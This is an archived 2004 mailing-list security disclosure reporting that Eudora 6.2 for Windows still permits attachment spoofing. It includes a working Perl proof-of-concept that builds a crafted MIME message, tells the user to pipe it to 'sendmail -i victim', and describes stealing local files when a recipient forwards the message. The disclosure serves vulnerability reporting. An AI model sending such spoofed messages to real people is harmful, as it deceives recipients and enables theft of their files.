Eudora 6.2 attachment spoof

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 11/13/04

  • Next message: Hans Ulrich Niedermann: "TWiki search function allows arbitrary shell command execution" 
    Date: Sun, 14 Nov 2004 05:23:28 +1100 (EST)
To: NTBugtraq@listserv.ntbugtraq.com, beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, sdorner@qualcomm.com

    Eudora 6.2 (==6.2.0.14) for Windows was released on 8 Nov 04. The release
    notes

      http://www.eudora.com/download/eudora/windows/6.2/RelNotes.txt

    say:

    > SECURITY
    > --------
    > Fixed cases where attachments could be spoofed via base64 or quoted-printable
    > encoded (plain-text, inline) MIME parts.

    Some cases remain un-fixed, as Eudora developers know and admit privately.
    One such example below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    use MIME::Base64;

    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.2 on Windows spoof\n";
    print "MIME-Version: 1.0\n";
    print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

    print "--zzz\n";
    print "Content-Type: text/plain\n";
    print "Content-Transfer-Encoding: 7bit\n\n";
    print "With spoofed attachments, we could 'steal' files if the message
    was forwarded (not replied to). Get a warning when stealing arbitrary
    files, but no warning when stealing 'attach\\existing' attachments.\n";

    print "\n--zzz\n";
    print "Content-Type: text/plain; name=\"b1.txt\"\n";
    print "Content-Transfer-Encoding: base64\n";
    print "Content-Disposition: inline; filename=\"b1.txt\"\n\n";
    $z = "Within base64 encoded, use missing linebreak. Part 1 ...\r
    AttachmenXX";
    print encode_base64($z);

    print "\n--zzz\n";
    print "Content-Type: text/plain; name=\"b2.txt\"\n";
    print "Content-Transfer-Encoding: base64\n";
    print "Content-Disposition: inline; filename=\"b2.txt\"\n\n";
    $z = "t Converted: \"c:\\winnt\\system32\\calc.exe\"\r
    ... part 2\r
    BTW, the above shows a parsing bug: missing two characters.\r
    \r\n";
    print encode_base64($z);

    print "\n--zzz--\n";

  • Next message: Hans Ulrich Niedermann: "TWiki search function allows arbitrary shell command execution"

    Relevant Pages

    • [Full-Disclosure] Eudora 6.2 attachment spoof
      ... > Fixed cases where attachments could be spoofed via base64 or quoted-printable ... > encoded MIME parts. ... as Eudora developers know and admit privately. ... Get a warning when stealing arbitrary ...
      (Full-Disclosure)
    • Eudora 6.2 attachment spoof
      ... > Fixed cases where attachments could be spoofed via base64 or quoted-printable ... > encoded MIME parts. ... as Eudora developers know and admit privately. ... Get a warning when stealing arbitrary ...
      (Full-Disclosure)
    • Eudora 6.2 attachment spoof
      ... > Fixed cases where attachments could be spoofed via base64 or quoted-printable ... as Eudora developers know and admit privately. ... $221.25 US Dollars for domestic exam delivery and $296.25 US Dollars ...
      (NT-Bugtraq)
    • RE: [Full-Disclosure] Avoiding being a good admin - was DCOM RPC exploit (dcom.c)
      ... warning of impending doom and being proved right when no-one takes ... The information contained in this email and any attachments is ... RNIB has made strenuous efforts to ensure that emails and any ...
      (Full-Disclosure)
    • {Filename?} Returned mail: see transcript for details
      ... This message has had one or more attachments removed ... Warning:. ... This is a message from the MailScanner E-Mail Virus Protection Service ... The original e-mail attachment "attachment.scr" ...
      (comp.lang.python)